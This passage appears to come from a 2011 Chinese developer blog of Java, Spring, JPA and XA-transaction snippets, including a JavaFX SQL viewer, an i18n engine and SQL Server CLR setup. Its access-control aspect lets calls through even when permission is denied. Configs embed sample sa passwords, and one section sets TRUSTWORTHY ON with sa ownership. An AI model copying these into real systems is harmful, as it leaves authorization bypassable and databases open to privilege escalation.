    launch(args);
  }

  public static void main(String[] args) throws Exception {
    launch(args);
    // test();
  }

}

QueryVisual.java, 用于在GUI上显示结果

package forest;

import java.util.List;

import javafx.application.Application;
import javafx.collections.FXCollections;
import javafx.event.EventHandler;
import javafx.geometry.Insets;
import javafx.scene.Group;
import javafx.scene.Scene;
import javafx.scene.control.Label;
import javafx.scene.control.ScrollPane;
import javafx.scene.control.TableColumn;
import javafx.scene.control.TableView;
import javafx.scene.control.ScrollPane.ScrollBarPolicy;
import javafx.scene.input.KeyCode;
import javafx.scene.input.KeyEvent;
import javafx.scene.layout.VBox;
import javafx.scene.text.Font;
import javafx.stage.Stage;
import javafx.util.Callback;

import org.apache.commons.beanutils.BasicDynaBean;
import org.apache.commons.beanutils.DynaBean;

public class QueryVisual extends Application implements EventHandler<KeyEvent> {
  private TableView<DynaBean> table = new TableView<DynaBean>();

  public static void main(String[] args) throws Exception {
    Query.launch(args);
    launch(args);
  }

  @Override
  public void start(Stage stage) throws Exception {
    Scene scene = new Scene(new Group());
    stage.setTitle("Result View");

    final Label label = new Label("SQL Result");
    label.setFont(new Font("Arial", 20));

    table.setStyle("-fx-base: #b6e7c9;");

    final List<String> cols = Query.getColumnNames();
    List<DynaBean> rows = Query.getBeans();
    for (final String col : cols) {
      TableColumn<String> nameCol = new TableColumn<String>(col);
      nameCol
          .setDataRetriever(new Callback<TableColumn.CellDataFeatures<String>, String>() {
            public String call(
                TableColumn.CellDataFeatures<String> p) {
              return (String) ((BasicDynaBean) p.getValue())
                  .get(col.toLowerCase());
            }
          });
      table.getColumns().add(nameCol);
    }

    table.setItems(FXCollections.observableArrayList(rows));
    table.setPrefHeight(380);
    table.setPrefWidth(600);
    final VBox vbox = new VBox();
    vbox.setSpacing(5);
    vbox.getChildren().addAll(label, table);
    vbox.setPadding(new Insets(10, 0, 0, 10));
    ScrollPane sp = new ScrollPane();
    sp.setHbarPolicy(ScrollBarPolicy.ALWAYS);
    sp.setVbarPolicy(ScrollBarPolicy.ALWAYS);

    sp.setPrefHeight(400);
    sp.setPrefWidth(760);

    sp.setNode(vbox);

    sp.setOnKeyReleased(this);
    scene.setOnKeyReleased(this);

    ((Group) scene.getRoot()).getChildren().add(sp);
    stage.setScene(scene);
    stage.setVisible(true);
  }

  @Override
  public void handle(KeyEvent event) {
    if (event.getCode().equals(KeyCode.ESCAPE))
      System.exit(0);
  }
}

EditPlus的用户工具配置

tool_ui.ini

控制台显示

Text=run SQL in Console
Command=C:\Users\user\Desktop\Forest\command\run SQL.bat
Argument=$(Prompt) "$(CurSel)"
InitDir=$(FileDir)

run SQL.bat
"C:\Program Files\Java\jre7\bin\java.exe" -cp .;"C:\Users\user\workspace\SQL Query\bin";C:\Users\user\workspace\common-lib\ojdbc14.jar;C:\Users\user\workspace\common-lib\sqljdbc4.jar;C:/Users/user/Desktop/Forest/spring-framework-2.5.6/lib/jakarta-commons/commons-beanutils.jar;C:/Users/user/Desktop/Forest/spring-framework-2.5.6/lib/jakarta-commons/commons-lang.jar forest.Query %1 %2

GUI显示

Text=run SQL in GUI
Command=C:\Users\user\Desktop\Forest\command\javafx.bat
Argument=$(Prompt) "$(CurSel)"
InitDir=$(FileDir)

javafx.bat
"C:\Program Files\Java\jre7\bin\java.exe" -cp C:\Users\user\Downloads\javafx-sdk2.0-beta\rt\lib\jfxrt.jar;.;"C:\Users\user\workspace\SQL Query\bin";C:\Users\user\workspace\common-lib\ojdbc14.jar;C:\Users\user\workspace\common-lib\sqljdbc4.jar;C:/Users/user/Desktop/Forest/spring-framework-2.5.6/lib/jakarta-commons/commons-beanutils.jar;C:/Users/user/Desktop/Forest/spring-framework-2.5.6/lib/jakarta-commons/commons-lang.jar forest.QueryVisual %1 "gui" %2

2011-07-29

2011-07-29

Spring + JPA + atomikos实现Oracle + SQL Server

persistence.xml

<?xml version="1.0" encoding="UTF-8"?>
<persistence version="1.0"
	xmlns="http://java.sun.com/xml/ns/persistence"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://java.sun.com/xml/ns/persistence http://java.sun.com/xml/ns/persistence/persistence_1_0.xsd">

	<persistence-unit name="orcaleXA" transaction-type="JTA">
		<provider>org.hibernate.ejb.HibernatePersistence</provider>
		<properties>
			<property name="hibernate.dialect"
				value="org.hibernate.dialect.Oracle10gDialect" />
			<property name="hibernate.connection.driver_class"
				value="oracle.jdbc.xa.client.OracleXADataSource" />
			<property name="hibernate.connection.url"
				value="jdbc:oracle:thin:name/password@192.168.201.215:1521:XE" />
			<property name="hibernate.show_sql" value="true" />
			<!-- property name="hibernate.transaction.factory_class" 
				value="com.atomikos.icatch.jta.hibernate3.AtomikosJTATransactionFactory" /-->
			<property name="hibernate.transaction.manager_lookup_class"
				value="com.atomikos.icatch.jta.hibernate3.TransactionManagerLookup" />
		</properties>
	</persistence-unit>


	<persistence-unit name="sqlServerXA" transaction-type="JTA">
		<provider>org.hibernate.ejb.HibernatePersistence</provider>
		<properties>
			<property name="hibernate.dialect"
				value="org.hibernate.dialect.SQLServerDialect" />
			<property name="hibernate.transaction.manager_lookup_class"
				value="com.atomikos.icatch.jta.hibernate3.TransactionManagerLookup" />
			<property name="hibernate.show_sql" value="true" />
		</properties>
	</persistence-unit>
</persistence>

atomikos文档上说不用设置hibernate.transaction.factory_class，另外发现在WAS配置Hibernate JPA也应该不要设置hibernate.transaction.factory_class。

applicationContext.xml

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:aop="http://www.springframework.org/schema/aop"
  xmlns:context="http://www.springframework.org/schema/context"
  xmlns:tx="http://www.springframework.org/schema/tx"
  xsi:schemaLocation="
    http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd
    http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.5.xsd
    http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-2.5.xsd
    http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.5.xsd">

  <context:component-scan base-package="xx.yy.mypackage" />
  <context:annotation-config />

  <bean id="dataSource"
    class="com.atomikos.jdbc.AtomikosDataSourceBean" init-method="init" destroy-method="close">
    <property name="uniqueResourceName">
      <value>XADBMS</value>
    </property>
    <property name="xaDataSourceClassName">
      <value>com.microsoft.sqlserver.jdbc.SQLServerXADataSource</value>
    </property>
    <property name="xaProperties">
      <props>
        <prop key="user">sa</prop>
        <prop key="password">Passw0rd</prop>
        <prop key="serverName">192.168.201.214</prop>
        <prop key="databaseName">myDataBase</prop>
      </props>
    </property>
    <property name="poolSize">
      <value>1</value>
    </property>
  </bean>

  <bean id="orcaleXAEntityManagerFactory"
    class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
    <property name="persistenceXmlLocation"
      value="/META-INF/persistence.xml" />
    <property name="persistenceUnitName" value="orcaleXA" />
  </bean>

  <bean id="sqlServerXAEntityManagerFactory"
    class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
    <property name="persistenceXmlLocation"
      value="/META-INF/persistence.xml" />
    <property name="persistenceUnitName" value="sqlServerXA" />
    <property name="dataSource" ref="dataSource" />
  </bean>

  <!-- bean id="transactionManager"
  class="org.springframework.orm.jpa.JpaTransactionManager">
  <property name="entityManagerFactory" ref="emf" />
  </bean-->

  <bean id="AtomikosTransactionManager"
    class="com.atomikos.icatch.jta.UserTransactionManager"
    init-method="init" destroy-method="close">
    <property name="forceShutdown" value="false" />
  </bean>

  <bean id="AtomikosUserTransaction"
    class="com.atomikos.icatch.jta.UserTransactionImp">
    <property name="transactionTimeout" value="300" />
  </bean>

  <bean id="transactionManager"
    class="org.springframework.transaction.jta.JtaTransactionManager">
    <property name="transactionManager"
      ref="AtomikosTransactionManager" />
    <property name="userTransaction" ref="AtomikosUserTransaction" />
  </bean>

  <tx:annotation-driven transaction-manager="transactionManager" />

  <tx:advice id="txAdvice" transaction-manager="transactionManager">
    <tx:attributes>
      <tx:method name="get*" read-only="true" />
      <tx:method name="find" read-only="true" />
      <tx:method name="check" read-only="true" />
      <tx:method name="*" read-only="false" />
    </tx:attributes>
  </tx:advice>

  <aop:config>
    <aop:pointcut id="txPointcut"
      expression="execution(public * xx.yy.mypacke..*Service.*(..))" />
    <aop:advisor advice-ref="txAdvice"
      pointcut-ref="txPointcut" />
  </aop:config>
</beans>

@Service
  public class XxService {
    @PersistenceContext(unitName = "orcaleXA")
    private EntityManager oracleXaEm;

    @PersistenceContext(unitName = "sqlServerXA")
    private EntityManager sqlServerXaEm;
    public void run(){
      oracleXaEm.createQuery("...");
      sqlServerXaEm.createQuery("...");
    }
  }

  @ContextConfiguration(locations = "/applicationContext.xml")
  public class TestXA extends AbstractJUnit38SpringContextTests {
    @Autowired
    private XxService xxService;

    public void testRun() {
      System.out.println("<<");
      myService.go();
    }
  }

lib:

atomikos-util.jar 
transactions-jta.jar 
transactions-api.jar 
transactions.jar 
transactions-hibernate3.jar 
transactions-jdbc.jar

2011-07-29

2011-07-29

简易I18n转换Engine

分三部分：

I18nFiled
在Entity里面指定i18n字段
调用convertI18n(xEntity).getI18nShortDesc()

import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;

@Target( { ElementType.METHOD, ElementType.FIELD })
@Retention(RetentionPolicy.RUNTIME)
public @interface I18nFiled {
  String en();

  String sc();

  String tc();
}

public class XEntity implements Serializable {
	@Transient
	@I18nFiled(en = "shortDescEn", sc = "shortDescSc", tc = "shortDescTc")
	private String i18nShortDesc;

	public String getI18nShortDesc() {
		return i18nShortDesc;
	}

	public void setI18nShortDesc(String shortDesc) {
		i18nShortDesc = shortDesc;
	}
}

AUser的默认语言是英文，BUser的默认语言是繁体中文

 private static void defaultLanguage(Object i18n, Locale locale,
		boolean AUser, I18nFiled i18nFiled, Field f)
		throws SecurityException, NoSuchFieldException,
		IllegalArgumentException, IllegalAccessException {
	log.info("default locale");
	if (AUser) {
		Field enField = i18n.getClass().getDeclaredField(i18nFiled.en());
		enField.setAccessible(true);
		String enValue = enField.get(i18n).toString();
		f.set(i18n, enValue);
	} else {
		// BUser
		Field tcField = i18n.getClass().getDeclaredField(i18nFiled.tc());
		tcField.setAccessible(true);
		String tcValue = tcField.get(i18n).toString();
		if (StringUtils.isNotEmpty(tcValue)) {
			// show english
			Field enField = i18n.getClass()
					.getDeclaredField(i18nFiled.en());
			enField.setAccessible(true);
			String enValue = enField.get(i18n).toString();
			f.set(i18n, enValue);
		}
	}
}

private static void convertI18n(Object i18n, Locale locale, boolean AUser) {
	log.info("locale: " + locale);
	Field[] fields = i18n.getClass().getDeclaredFields();
	for (Field f : fields) {
		if (f.isAnnotationPresent(I18nFiled.class)) {
			f.setAccessible(true);
			I18nFiled i18nFiled = f.getAnnotation(I18nFiled.class);
			if (Locale.SIMPLIFIED_CHINESE.equals(locale)) {
				Field scField = i18n.getClass().getDeclaredField(
						i18nFiled.sc());
				scField.setAccessible(true);
				String scValue = scField.get(i18n).toString();
				if (StringUtils.isNotEmpty(scValue)) {
					f.set(i18n, scValue);
				} else {
					defaultLanguage(i18n, locale, AUser, i18nFiled, f);
				}
			} else if (Locale.TRADITIONAL_CHINESE.equals(locale)) {
				Field tcField = i18n.getClass().getDeclaredField(
						i18nFiled.tc());
				tcField.setAccessible(true);
				String tcValue = tcField.get(i18n).toString();
				if (StringUtils.isNotEmpty(tcValue)) {
					f.set(i18n, tcValue);
				} else {
					defaultLanguage(i18n, locale, AUser, i18nFiled, f);
				}
			} else {
				defaultLanguage(i18n, locale, AUser, i18nFiled, f);
			}
		}
	}
}

public static <T> T convertI18n(T i18n, PortletRequest request) {
	Locale locale = request.getLocale();
	User user = User.getCurrentUser(request);
	UserInfo info = user.getUserInfo();
	if (info instanceof AUserUserInfo) {
		convertI18n(i18n, locale, true);
	} else if (info instanceof BUserUserInfo) {
		convertI18n(i18n, locale, false);
	} else if (info instanceof UnknownUserInfo) {
		convertI18n(i18n, locale, true);
	}
	return i18n;
}

public static <T> T convertI18n(T i18n) {
	PortletRequest request = (PortletRequest) FacesContext
			.getCurrentInstance().getExternalContext().getRequest();
	return convertI18n(i18n, request);
}

2011-07-27

2011-07-27

EasyMock + Spring的Mock

本来想模拟JSF的 FacesContext.getCurrentInstance().getExternalContext().getRequest()来获得Principal 但发现比较麻烦，所以只实现模拟HttpServletRequest

使用EasyMock + Spring的MockObject做较为简单

Principal principal = EasyMock.createMock(Principal.class);
expect(principal.getName()).andReturn("JUDYEUNG");
MockHttpServletRequest request = new MockHttpServletRequest();
replay(principal);

request.setUserPrincipal(principal);

uploadBean.setRequest(request);

2011-07-27

2011-07-27

使用XA事务

如果使用WAS配置XA事务，可以参考

http://www.ibm.com/developerworks/cn/websphere/library/techarticles/0407_woolf/0407_woolf.html
http://liuqiang5151.iteye.com/blog/584422

如果使用Tomcat，可以使用atomickos

http://www.atomikos.com/

在WAS+Oracle环境中使用XA事务

定义XA数据源
使用XA的JDBC Driver
使用WebSphereUowTransactionManager，spring定义
<bean id="transactionManager" class="org.springframework.transaction.jta.WebSphereUowTransactionManager"/>
或者使用EJB的CMT或者使用JNDI获得transactionManager控制事务
如果是SQL SERVER 2008，则还需要如下步骤：
Control Panel -> Administrative Tools -> Component Services -> Local DT -> right click -> Properties -> Enable XA Transactions
之后restart SQLServer, restart WebServer(WAS or JBoss等)

参考:

JBoss的XA
http://wenku.baidu.com/view/9441cafa770bf78a65295463.html

SQL Server的XA
http://msdn.microsoft.com/en-us/library/aa342335.aspx
http://support.riversedgesoftware.com/knowledgebase.php?article=3

2011-07-21

2011-07-21

json-lib的toBean问题

XXBean有nested字段需要inject数据和有日期型数据

JsonConfig config = new JsonConfig();
config.setPropertySetStrategy(new PropertySetStrategy() {
  @Override
  public void setProperty(Object bean, String key, Object value)
      throws JSONException {
    try {
      PropertyUtils.setNestedProperty(bean, key, value);
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
});
  
XXBean xx = new XXBean();
XXBeanPK pk = new XXBeanPK();
xx.setPk(pk);

// 需要将字段中的日期型数据由java.sql.Date/java.sql.Timestamp改为java.util.Date
JSONUtils.getMorpherRegistry().registerMorpher(
    new DateMorpher(new String[] { "dd/MM/yyyy", "HH:mm" }));

xx = (XX) JSONObject.toBean(JSONObject.fromObject(data, config), xx, config);
log.info("xx "+ ToStringBuilder.reflectionToString(xx, ToStringStyle.MULTI_LINE_STYLE));

2011-07-08

2011-07-08

自定义访问权限控制

项目需要做一些权限访问控制，觉得比较好的方案是AOP+annotation，因为在Java EE的权限控制也是使用类似方式实现。

AccessRight的注解

@Target( { ElementType.METHOD, ElementType.FIELD })
@Retention(RetentionPolicy.RUNTIME)
public @interface AccessRight {
  String code();

  boolean access() default false;

  boolean create() default false;

  boolean update() default false;

  boolean delete() default false;
}

AccessControlAspect切面

@Component //如果不加，spring似乎不会识别这是一个切面
@Aspect
public class AccessControlAspect {
  private static final Logger log = Logger
      .getLogger(AccessControlAspect.class);

  @Pointcut("execution(* xx.*Bean.*()) ")
  public void accessControl() {
  }

  @Around("accessControl()")
  public Object checkRight(ProceedingJoinPoint jp) throws Throwable {
    String methodName = jp.getSignature().getName();
    log.info("check right: " + methodName);
    Method method = jp.getTarget().getClass().getDeclaredMethod(methodName);
    if (method.isAnnotationPresent(AccessRight.class)) {
      AccessRight right = method.getAnnotation(AccessRight.class);
      FunctionPermission permission = getRight(right.code());
      if (right.access() && permission.hasAccessPermission()) {
        log.info("has right to do");
        return jp.proceed();
      } else {
        log.error("no right to do");
      }

    }
    return jp.proceed();
  }

  private FunctionPermission getRight(String code) {
  }
}

applicationContext.xml加如下内容：

1 2	<context:component-scan base-package="xx" /> <aop:aspectj-autoproxy proxy-target-class="false"/> true表示使用cglib代理，否则使用java反射代理

应用在controller中

@Controller
@Scope("request")
public class xxBean {
  @AccessRight(code = "something", access = true)
  public String foobar() {
    log.info("test...");
    return "test";
  }
}

2011-06-28

2011-06-28

Servlet中执行定时任务

由于用spring配置的quartz在启动后不能获得UOWManager，考虑多时，只好在servlet启动时候执行定时任务。

import java.io.IOException;
import java.util.Timer;

import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.persistence.EntityManager;
import javax.persistence.Persistence;
import javax.servlet.GenericServlet;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;

import org.apache.log4j.Logger;
import org.springframework.web.context.support.WebApplicationContextUtils;

import com.ibm.websphere.uow.UOWSynchronizationRegistry;
import com.ibm.ws.uow.UOWManager;
import com.ibm.wsspi.uow.UOWAction;
import com.ibm.wsspi.uow.UOWActionException;
import com.ibm.wsspi.uow.UOWException;

public class CronJobServlet extends GenericServlet {
  private static final Logger log = Logger.getLogger(CronJobServlet.class);
  private static UOWManager manager;
  private static EntityManager em;
  private XXJob clearXXJob;

  @Override
  public void init(ServletConfig config) throws ServletException {
    initJob(config);
    try {
      InitialContext ic = new InitialContext();
      manager = (UOWManager) ic.lookup("java:comp/websphere/UOWManager");
    } catch (NamingException e) {
      e.printStackTrace();
    }
    try {
      manager.runUnderUOW(
          UOWSynchronizationRegistry.UOW_TYPE_GLOBAL_TRANSACTION,
          false, new UOWAction() {
            public void run() throws Exception {
              Timer timer = new Timer();
              timer.schedule(clearXXJob, 2000,1000);
            }

          });
    } catch (UOWActionException e) {
      e.printStackTrace();
    } catch (UOWException e) {
      e.printStackTrace();
    }

  }

  private void initJob(ServletConfig config) {
    em = Persistence.createEntityManagerFactory("xx")
        .createEntityManager();

    final CronJobService cronJobService = (CronJobService) WebApplicationContextUtils
        .getWebApplicationContext(config.getServletContext()).getBean(
            "cronJobService");
    cronJobService.setEntityManager(em);
    clearXXJob = new ClearXXJob(cronJobService);
  }

  @Override
  public void service(ServletRequest arg0, ServletResponse arg1)
      throws ServletException, IOException {

  }
}

2011-05-19

2011-05-19

spring 2.5 + jpa 1.0 + jsf 1.2

applicationContext.xml

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:aop="http://www.springframework.org/schema/aop"
    xmlns:context="http://www.springframework.org/schema/context"
    xmlns:tx="http://www.springframework.org/schema/tx"
    xsi:schemaLocation="
    http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd
    http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.5.xsd
    http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-2.5.xsd
    http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.5.xsd">

    <!-- bean class="org.springframework.orm.jpa.support.PersistenceAnnotationBeanPostProcessor" / -->

    <context:component-scan base-package="xx.yy.locker" />
    <context:annotation-config />

    <bean id="entityManagerFactory"
        class="org.springframework.orm.jpa.LocalEntityManagerFactoryBean">
            <property name="persistenceUnitName" value="locker" />
    </bean>

    <bean id="transactionManager"
        class="org.springframework.transaction.jta.WebSphereUowTransactionManager"/>

    <tx:annotation-driven transaction-manager="transactionManager" />

    <tx:advice id="txAdvice" transaction-manager="transactionManager">
        <tx:attributes>
            <tx:method name="get*" read-only="true"/>
            <tx:method name="*" read-only="false" />
        </tx:attributes>
    </tx:advice>

    <aop:config>
        <aop:pointcut id="lockerManagerOperation" expression="execution(public * xx.yy..*.*(..))"/>
        <aop:advisor advice-ref="txAdvice" pointcut-ref="lockerManagerOperation"/>
    </aop:config>

</beans>

persistence.xml

<?xml version="1.0" encoding="UTF-8"?>
<persistence version="1.0"
    xmlns="http://java.sun.com/xml/ns/persistence"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://java.sun.com/xml/ns/persistence http://java.sun.com/xml/ns/persistence/persistence_1_0.xsd">
    <persistence-unit name="testDB" transaction-type="JTA">
    <provider>org.hibernate.ejb.HibernatePersistence</provider>
    <jta-data-source>jdbc/xx</jta-data-source>
        <properties>
            <property name="hibernate.dialect"
                value="org.hibernate.dialect.Oracle10gDialect" />
            <property name="hibernate.connection.driver_class"
                value="oracle.jdbc.pool.OracleConnectionPoolDataSource" />
            <!-- property name="hibernate.transaction.factory_class" value="org.hibernate.transaction.CMTTransactionFactory" / -->
            <property name="hibernate.transaction.manager_lookup_class" value="org.hibernate.transaction.WebSphereExtendedJTATransactionLookup"/>
        </properties>
    </persistence-unit>
</persistence>

libs:

antlr-2.7.6.jar
aspectjrt.jar
aspectjweaver.jar
commons-beanutils.jar
commons-collections.jar
commons-logging.jar
dom4j-1.6.1.jar
hibernate-annotations.jar
hibernate-commons-annotations.jar
hibernate-entitymanager.jar
hibernate3.jar
javassist-3.4.GA.jar
common-annotations.jar
log4j-1.2.16.jar
persistence.jar
slf4j-api-1.5.0.jar
slf4j-log4j12-1.5.0.jar
spring-2.5.jar

注意：

使用<context:component-scan>或<context:annotation-config />的话，可以不用
<bean class="org.springframework.orm.jpa.support.PersistenceAnnotationBeanPostProcessor" />
使用<tx:annotation-driven> + <tx:advice> + <aop:config> 可以不用 @transactional
WAS的TransactionManager要用WebSphereUowTransactionManager
hibernate.transaction.manager_lookup_class 用 org.hibernate.transaction.WebSphereExtendedJTATransactionLookup
hibernate.transaction.factory_class 不能使用 org.hibernate.transaction.CMTTransactionFactory，因为WAS的transaction不是一个joinableTransaction，所以只能使用org.hibernate.transaction.JDBCTransactionFactory
删除WEB-INF/lib中的jta.jar，否则会出现错误。估计这个jta.jar跟WAS的有版本不兼容问题。

JSF集成spring
web.xml

 <listener>
   <listener-class>org.springframework.web.context.request.RequestContextListener</listener-class>
 </listener>
faces-config.xml
 <faces-config>
   <application>
     <variable-resolver>org.springframework.web.jsf.DelegatingVariableResolver</variable-resolver>
   </application>
 </faces-config>

这样就不用写Managed-Bean，但EL不能获得managedBean的数据，只能用JSF的EL读取managedBean，
即不能${xBean}，只能#{xBean}

<context:annotation-config />支持JSR-250 annotations，即 @Resource， @PostConstruct， @PreDestroy。
等价于<bean class="org.springframework.context.annotation.CommonAnnotationBeanPostProcessor">
而CommonAnnotationBeanPostProcessor支持 @EJB

参考：

http://www.ibm.com/developerworks/websphere/techjournal/0609_alcott/0609_alcott.html

中文：

2011-04-28

2011-04-28

Java编码转换

gbk(cp18030/cp936)转unicode(cp1200)

String str = "没有任何意义的一句说话";
for (int i = 0; i < str.length(); i++) {
    String charactor = str.substring(i, i + 1);
    byte[] b = charactor.getBytes("UTF-16BE"); // 如果是UTF-16LE，则高低位翻转
    String s1 = Integer.toHexString(b[0]).replace("ffffff", "");
    String s2 = Integer.toHexString(b[1]).replace("ffffff", "");
    if (s1.length() < 2)
        s1 = "0" + s1;
    if (s2.length() < 2)
        s2 = "0" + s2;
    String s = s1 + s2;
    out.println(String.format("十六进制的表示 &#x%s;", s));
    out.println(String.format("十进制的表示   &#%s;", Integer.parseInt(s, 16))); //Integer.valueOf(s, 16) or Integer.decode("0x" + s)
    out.println();
}<span class="Apple-style-span" style="font-family:''sans serif', tahoma, verdana, helvetica';font-size:x-large;"><span class="Apple-style-span" style="font-size:19px;line-height:19px;white-space:normal;"> </span></span>

numeric character reference(NCR)

以&#x03A3(16进制);或&#0931(十进制);都可以在html显示unicode字符，例如:Σ
Python的方法会简单一些：
unicode(‘没有任何意义的一句说话‘,’gbk’)可以输出它的unicode编码
显示十进制结果：int(‘3A3’, 16)

还原big5文字

char.txt文件保存的汉字是繁体big5编码的【書院】，但显示为【皘】

编写如下代码还原

InputStreamReader reader = new InputStreamReader(new FileInputStream("char.txt"));
char[] chars = new char[892600];
int len = reader.read(chars);
String sql = new String(chars, 0, len);
out.println(new String(sql.getBytes(), "big5_hkscs"));
reader.close();

参考：

Numeric_character_reference

2011-04-20

2011-04-20

在MSSQL Server 2008中创建可以访问外部资源的DLL

CREATE ASSEMBLY [CharSetUtil]
FROM 'XXX.dll'
WITH PERMISSION_SET = EXTERNAL_ACCESS
GO

ALTER DATABASE [somedb] set TRUSTWORTHY on
EXEC sp_changedbowner 'sa'

USE somedb
GRANT EXTERNAL ACCESS ASSEMBLY TO sa

exec sp_configure 'show advanced options', '1';
reconfigure;
go

exec sp_configure 'clr enabled', '1'
go

reconfigure;
exec sp_configure 'show advanced options', '1';
go

编写clr函数注意：

静态类型static修饰的函数
如果函数内部不执行sql查询，应定义DataAccessKind.None
最好定义IsDeterministic = true。但如果是DataAccessKind.READ，定义确定性函数也是没有用的。

2011-04-02

2011-04-02

处理UTF-8格式的java文件中的多余空行的checkstyle问题

package test;


import java.io.BufferedReader;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.FileReader;

import java.util.ArrayList;
import java.util.List;


public class RemoveBlacket
{
  public static void main(String[] args)
      throws Exception
  {
    for (String file : listPath())
    {
      System.out.println(file);
      proces(file);
    }
    //    test();
  }


  static void test()
      throws Exception
  {
    String file = "C:\\Temp.java";
    FileInputStream in = new FileInputStream(file);
    byte[] bytes = new byte[81920000];
    int len = in.read(bytes);
    String content = new String(bytes, 0, len, "UTF-8"); // 以UTF-8格式处理内容
    content = content.replaceAll("\r\n(\r\n\\s+\\})", "$1");
    in.close();

    FileOutputStream out = new FileOutputStream("C:/text.java");
    //    OutputStreamWriter writer = new OutputStreamWriter(out);
    System.out.println(content);
    out.write(content.getBytes("UTF-8"));; // 还原UTF-8格式内容

    //    writer.close();
    out.close();

  }


  static void proces(String file)
      throws Exception
  {
    FileInputStream in = new FileInputStream(file);
    byte[] bytes = new byte[80920000];
    int len = in.read(bytes);
    String content = new String(bytes, 0, len, "UTF-8");// 以UTF-8格式处理内容
    content = content.replaceAll("\r\n(\r\n\\s+\\})", "$1");
    in.close();

    FileOutputStream out = new FileOutputStream(file);
    //    System.out.println(content);
    out.write(content.getBytes("UTF-8"));// 还原UTF-8格式内容

    out.close();
  }


  static List<String> listPath()
      throws Exception
  {
    List<String> list = new ArrayList<String>();
    BufferedReader reader = new BufferedReader(new FileReader("c:/checkstyle-list.txt"));
    String line;
    while ((line = reader.readLine()) != null)
    {
      list.add(line);
    }
    reader.close();

    return list;
  }
}

2011-04-01

2011-04-01

用kyotocabinet备份MediaWiki数据

package jay;

import static java.lang.System.out;

import java.io.InputStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

import kyotocabinet.Cursor;
import kyotocabinet.DB;

public class TakeBack {
  static Connection conn;
  static {
    try {
      Class.forName("com.mysql.jdbc.Driver");
      conn = DriverManager.getConnection(
          "jdbc:mysql://DBServer:3306/wiki", "user", "passwd");
    } catch (Exception e) {
      e.printStackTrace();
    }
  }

  static void showHashDB() {
    DB db = new DB();
    if (!db.open("witube.kch", DB.OWRITER | DB.OCREATE)) {
      System.err.println("open error: " + db.error());
    }

    Cursor cur = db.cursor();
    cur.jump();
    String[] rec;
    while ((rec = cur.get_str(true)) != null) {
      System.out.println(rec[0] + ":" + rec[1]);
      break;
    }
    cur.disable();
    if (!db.close()) {
      System.err.println("close error: " + db.error());
    }
  }

  static void backupMediawiki() throws Exception {
    DB db = new DB();
    if (!db.open("witube.kch", DB.OWRITER | DB.OCREATE)) {
      System.err.println("open error: " + db.error());
    }

    String sql = "SELECT page_title, old_text FROM `page` p, revision r, text t WHERE page_latest = r.rev_id and r.rev_text_id = t.old_id and page_namespace = 0";
    Statement stmt = conn.createStatement();
    ResultSet rs = stmt.executeQuery(sql);
    while (rs.next()) {
      InputStream in = rs.getBlob(1).getBinaryStream();
      byte[] bytes = new byte[89200000];
      int len = in.read(bytes);
      String title = new String(bytes, 0, len, "UTF-8");
      in.close();

      in = rs.getBlob(2).getBinaryStream();
      len = in.read(bytes);
      if (len == -1) {
        out.println("标题：" + title + " 没有内容。");
        continue;
      }
      String content = new String(bytes, 0, len, "UTF-8");
      in.close();
      // out.println("title: " + title + " content: " + content);

      db.set(title, content);
    }

    rs.close();
    stmt.close();
    conn.close();
    if (!db.close()) {
      System.err.println("close error: " + db.error());
    }
  }

  public static void main(String[] args) throws Exception {
    backupMediawiki();
    showHashDB();
  }
}

2011-04-01

2011-04-01

apache POI + 中文过滤导出MSSQL Server的数据

package jay;

import java.io.BufferedReader;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.FileReader;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

import static java.lang.System.out;
import org.apache.poi.hssf.usermodel.HSSFCell;
import org.apache.poi.hssf.usermodel.HSSFCellStyle;
import org.apache.poi.hssf.usermodel.HSSFFont;
import org.apache.poi.hssf.usermodel.HSSFRichTextString;
import org.apache.poi.hssf.usermodel.HSSFRow;
import org.apache.poi.hssf.usermodel.HSSFSheet;
import org.apache.poi.hssf.usermodel.HSSFWorkbook;
import org.apache.poi.hssf.util.HSSFColor;

public class CheckData {

  static {
    try {
      Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver");
    } catch (ClassNotFoundException e) {
      // TODO Auto-generated catch block
      e.printStackTrace();
    }
  }

  static void run(String db, boolean only_chinese) throws Exception {
    Map<String, List<String>> map = new HashMap<String, List<String>>();

    BufferedReader reader = new BufferedReader(new FileReader(db + ".txt"));
    String line;

    /**
     * table1=field1,field2,field3,field4,field5
     * table2=field1,field2,field3,field4,field5
     */
    while ((line = reader.readLine()) != null) {
      List<String> list = new ArrayList<String>();
      String[] parts = line.split("=");
      String table = parts[0];
      String fields = parts[1];
